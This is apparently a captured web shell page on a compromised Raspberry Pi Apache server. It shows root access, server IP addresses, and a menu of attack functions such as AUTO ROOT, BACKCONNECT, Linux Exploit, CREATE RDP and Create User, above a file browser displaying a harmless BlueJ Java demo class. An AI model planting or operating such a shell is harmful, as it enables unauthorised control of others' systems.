Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
BlueJ /
people /
[ HOME SHELL ]
Name
Size
Permission
Action
Database.ctxt
363
B
-rw-r--r--
Database.java
885
B
-rw-r--r--
Person.ctxt
734
B
-rw-r--r--
Person.java
1.22
KB
-rw-r--r--
README.TXT
1
KB
-rw-r--r--
Staff.ctxt
684
B
-rw-r--r--
Staff.java
1.1
KB
-rw-r--r--
Student.ctxt
550
B
-rw-r--r--
Student.java
1000
B
-rw-r--r--
package.bluej
855
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Person.java
/** * A person class for a simple BlueJ demo program. Person is used as * an abstract superclass of more specific person classes. * * @author Michael Kölling * @version 1.0, January 1999 */ abstract class Person { private String name; private int yearOfBirth; /** * Create a person with given name and age. */ Person(String name, int yearOfBirth) { this.name = name; this.yearOfBirth = yearOfBirth; } /** * Set a new name for this person. */ public void setName(String newName) { name = newName; } /** * Return the name of this person. */ public String getName() { return name; } /** * Set a new birth year for this person. */ public void setYearOfBirth(int newYearOofBirth) { yearOfBirth = newYearOofBirth; } /** * Return the birth year of this person. */ public int getYearOfBirth() { return yearOfBirth; } /** * Return a string representation of this object. */ public String toString() // redefined from "Object" { return "Name: " + name + "\n" + "Year of birth: " + yearOfBirth + "\n"; } }
Close